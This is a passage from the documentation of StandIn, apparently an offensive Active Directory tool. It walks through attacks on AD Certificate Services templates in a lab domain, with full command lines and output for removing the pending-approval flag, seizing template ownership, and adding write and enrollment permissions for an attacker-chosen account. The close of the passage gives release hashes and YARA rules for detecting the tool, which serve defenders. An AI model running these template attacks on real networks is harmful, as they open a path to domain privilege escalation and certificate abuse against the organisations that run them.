[+] Removing msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
|_ Success
When the certificate template
msPKI-Enrollment-Flagproperty contains thePEND_ALL_REQUESTSflag then all certificate requests are queued into apendingstate and theCA Certificate Managerwill have to approve those requests. This is not desirable from an attacker perspective. With the appropriateobject permissionsthis function allows the operator to add or remove that flag from the template.
Add/remove PEND_ALL_REQUESTS flag from the WebServer template. Here the --filter flag has to match the template name exactly.
C:\>StandIn.exe --adcs --filter WebServer --pend --remove
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : PEND_ALL_REQUESTS
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 2:54:51 PM
[+] Removing msPKI-Enrollment-Flag : PEND_ALL_REQUESTS
|_ Success
C:\>StandIn.exe --adcs --filter WebServer --pend --add
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 2:50:37 PM
[+] Adding msPKI-Enrollment-Flag : PEND_ALL_REQUESTS
|_ Success
In some special cases the operator may have
WriteOwnerpermissions on thetemplate object. Where other attacks are not possible, the operator can change the owner of the template which will grant the new ownerGenericAllpermissions over the template. This attack is not very desirable, seecaveats.
Set the Owner of the template object to REDHOOK\MBWillett. Here the --filter flag has to match the template name exactly.
C:\>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\MBWillett" --owner
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 2:58:19 PM
[+] Set object access rules
[+] Changing template owner : REDHOOK\MBWillett
|_ Success
C:\>StandIn.exe --adcs --filter WebServer
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Certificate Authority : redhook-RH-DC01-CA
|_ DNS Hostname : RH-DC01.redhook.local
|_ Cert DN : CN=redhook-RH-DC01-CA, DC=redhook, DC=local
|_ GUID : e1885348-e2b3-4e02-9147-54c4c430bc53
|_ Published Templates : CrossCA
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
SubCA
Administrator
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Schema Version : 1
|_ pKIExpirationPeriod : 2 years
|_ pKIOverlapPeriod : 6 weeks
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Owner : REDHOOK\MBWillett
|_ Permission Identity : REDHOOK\Domain Admins
| |_ Type : Allow
| |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Domain Users
| |_ Type : Allow
| |_ Permission : GenericAll
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Enterprise Admins
| |_ Type : Allow
| |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Domain Admins
| |_ Type : Allow
| |_ Permission : ReadProperty, WriteProperty, ExtendedRight
| |_ Object : Certificate-Enrollment
|_ Permission Identity : REDHOOK\Enterprise Admins
| |_ Type : Allow
| |_ Permission : ReadProperty, WriteProperty, ExtendedRight
| |_ Object : Certificate-Enrollment
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 3:05:45 PM
This attack comes with some extra constraints. In lab testing I found that when a user context had the WriteOwner privilege then that user could only change the Owner to themselves providing any other user identity caused the request to fail. Additionally, once changed, the owner could not be reverted to it's old sate unless executing from an Enterprise Admins context.
These restraints make this attack undesirable, it should only be used if no other options are available. In order to revert back to the old Owner the operator can generate a certificate for an Enterprise Admins user and use that the change the owner back.
# WebServer owned by REDHOOK\MBWillett & executing as "REDHOOK\MBWillett"
C:\>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\Enterprise Admins" --owner
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 4:18:21 PM
[+] Set object access rules
[+] Changing template owner : REDHOOK\Enterprise Admins
[!] Failed to modify ADCS permissions..
|_ A constraint violation occurred.
# WebServer owned by REDHOOK\MBWillett & executing in "REDHOOK\Enterprise Admins" context
C:\>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\Enterprise Admins" --owner
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 3:05:45 PM
[+] Set object access rules
[+] Changing template owner : REDHOOK\Enterprise Admins
|_ Success
Template write permissions may be necessary to perform some of the other outlined
template attacks. With the appropriateobject permissionsthis function allows the operator to add or removeWriteDacl/WriteOwner/WritePropertypermissions from anNtAccounton thetemplate object.
Add/remove Write permissions over the WebServer template for REDHOOK\MBWillett. Here the --filter flag has to match the template name exactly.
C:\>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\MBWillett" --write --add
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 3:15:44 PM
[+] Set object access rules
[+] Adding write permissions : REDHOOK\MBWillett
|_ Success
C:\>StandIn.exe --adcs --filter WebServer
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Certificate Authority : redhook-RH-DC01-CA
|_ DNS Hostname : RH-DC01.redhook.local
|_ Cert DN : CN=redhook-RH-DC01-CA, DC=redhook, DC=local
|_ GUID : e1885348-e2b3-4e02-9147-54c4c430bc53
|_ Published Templates : CrossCA
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
SubCA
Administrator
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Schema Version : 1
|_ pKIExpirationPeriod : 2 years
|_ pKIOverlapPeriod : 6 weeks
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Owner : REDHOOK\Enterprise Admins
|_ Permission Identity : REDHOOK\Domain Admins
| |_ Type : Allow
| |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Domain Users
| |_ Type : Allow
| |_ Permission : GenericAll
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Enterprise Admins
| |_ Type : Allow
| |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
| |_ Object : ANY
|_ Permission Identity : REDHOOK\MBWillett
| |_ Type : Allow
| |_ Permission : WriteProperty, WriteDacl, WriteOwner
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Domain Admins
| |_ Type : Allow
| |_ Permission : ReadProperty, WriteProperty, ExtendedRight
| |_ Object : Certificate-Enrollment
|_ Permission Identity : REDHOOK\Enterprise Admins
| |_ Type : Allow
| |_ Permission : ReadProperty, WriteProperty, ExtendedRight
| |_ Object : Certificate-Enrollment
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 3:29:36 PM
C:\>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\MBWillett" --write --remove
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 3:29:36 PM
[+] Set object access rules
[+] Removing write permissions : REDHOOK\MBWillett
|_ Success
To be able to request
template certificatestherequestorhas to haveCertificate-Enrollmentpermissions. With the appropriateobject permissionsthis function allows the operator to add or removeCertificate-Enrollmentpermissions from anNtAccounton thetemplate object.
Add/remove Certificate-Enrollment permissions on the WebServer template for REDHOOK\MBWillett. Here the --filter flag has to match the template name exactly.
C:\>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\MBWillett" --enroll --add
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 3:29:57 PM
[+] Set object access rules
[+] Adding Certificate-Enrollment permission : REDHOOK\MBWillett
|_ Success
C:\>StandIn.exe --adcs --filter WebServer
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Certificate Authority : redhook-RH-DC01-CA
|_ DNS Hostname : RH-DC01.redhook.local
|_ Cert DN : CN=redhook-RH-DC01-CA, DC=redhook, DC=local
|_ GUID : e1885348-e2b3-4e02-9147-54c4c430bc53
|_ Published Templates : CrossCA
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
SubCA
Administrator
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Schema Version : 1
|_ pKIExpirationPeriod : 2 years
|_ pKIOverlapPeriod : 6 weeks
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Owner : REDHOOK\Enterprise Admins
|_ Permission Identity : REDHOOK\Domain Admins
| |_ Type : Allow
| |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Domain Users
| |_ Type : Allow
| |_ Permission : GenericAll
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Enterprise Admins
| |_ Type : Allow
| |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Domain Admins
| |_ Type : Allow
| |_ Permission : ReadProperty, WriteProperty, ExtendedRight
| |_ Object : Certificate-Enrollment
|_ Permission Identity : REDHOOK\Enterprise Admins
| |_ Type : Allow
| |_ Permission : ReadProperty, WriteProperty, ExtendedRight
| |_ Object : Certificate-Enrollment
|_ Permission Identity : REDHOOK\MBWillett
| |_ Type : Allow
| |_ Permission : ExtendedRight
| |_ Object : Certificate-Enrollment
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 3:38:36 PM
C:\>StandIn.exe --adcs --filter WebServer --ntaccount "REDHOOK\MBWillett" --enroll --remove
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 3:38:36 PM
[+] Set object access rules
[+] Removing Certificate-Enrollment permission : REDHOOK\MBWillett
|_ Success
This section outlines a number of IOC's which can aid in the detection engineering process for StandIn.
The following table maps the release package hashes for StandIn.
-=v1.3=-
StandIn_Net35.exe SHA256: C2ACD3667483E5AC1E423E482DBA462E96DA3978776BFED07D9B436FEE135AB2
MD5: 5E9364F46723B7DC5FF24DE6E9C69E76
StandIn_Net45.exe SHA256: 2E37A3D2DC2ECB0BD026C93055A71CAB4E568B062B1C9F7B8846E04DF1E9F3E6
MD5: 566FFA0555E81560407B8CE6E458E829
-=v1.2=-
StandIn_Net35.exe SHA256: DCCDA4991BEBC5F2399C47C798981E7828ECC2BA77ED52A1D37BD866AD5582AA
MD5: D11A8CC4768221CEB5A128A349C5E094
StandIn_Net45.exe SHA256: 24C53132B594B77D2109CAEE3E276EA4603EEF32BFECD5121746DB58258C50F7
MD5: DA2AFD1868FBEB9357C8D0FD62ED97EB
-=v0.8=-
StandIn_Net35.exe SHA256: A0B3C96CA89770ED04E37D43188427E0016B42B03C0102216C5F6A785B942BD3
MD5: 8C942EE4553E40A7968FF0C8DC5DB9AB
StandIn_Net45.exe SHA256: F80AEB33FC53F2C8D6313A6B20CD117739A71382C208702B43073D54C9ACA681
MD5: 9E0FC3159A6BF8C3A8A0FAA76F6F74F9
-=v0.7=-
StandIn_Net35.exe SHA256: A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0
MD5: 50D29F7597BF83D80418DEEFD360F093
StandIn_Net45.exe SHA256: DBAB7B9CC694FC37354E3A18F9418586172ED6660D8D205EAFFF945525A6A31A
MD5: 4E5258A876ABCD2CA2EF80E0D5D93195
The following Yara rules can be used to detect StandIn on disk, in it's default form.
rule StandIn
{
meta:
author = "Ruben Boonen (@FuzzySec)"
description = "Detect StandIn string constants."
strings:
$s1 = "StandIn" ascii wide nocase
$s2 = "(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))" ascii wide nocase
$s3 = "msDS-AllowedToActOnBehalfOfOtherIdentity" ascii wide nocase
$s4 = ">--~~--> Args? <--~~--<" ascii wide nocase
condition:
all of ($s*)
}
rule StandIn_PDB
{
meta:
author = "Ruben Boonen (@FuzzySec)"
description = "Detect StandIn default PDB."
strings:
$s1 = "\\Release\\StandIn.pdb" ascii wide nocase
condition:
all of ($s*)
}The Yara rule below can be used to detect StandIn when execution happens from memory. To use this rule, the EDR solution will require access to the Microsoft-Windows-DotNETRuntime ETW data provider. For testing purposes, this rule can be directly evaluated using SilkETW. It should be noted that this is a generic example rule, production alerting would required a more granular approach.
rule Silk_StandIn_Generic
{
meta:
author = "Ruben Boonen (@FuzzySec)"
description = "Generic Microsoft-Windows-DotNETRuntime detection for StandIn."
strings:
$s1 = "\\r\\nFullyQualifiedAssemblyName=0;\\r\\nClrInstanceID=StandIn" ascii wide nocase
$s2 = "MethodFlags=Jitted;\\r\\nMethodNamespace=StandIn." ascii wide nocase
condition:
any of them
}
I just want to give a quick shout-out to people who have contributed code and/or bugfixes to StandIn.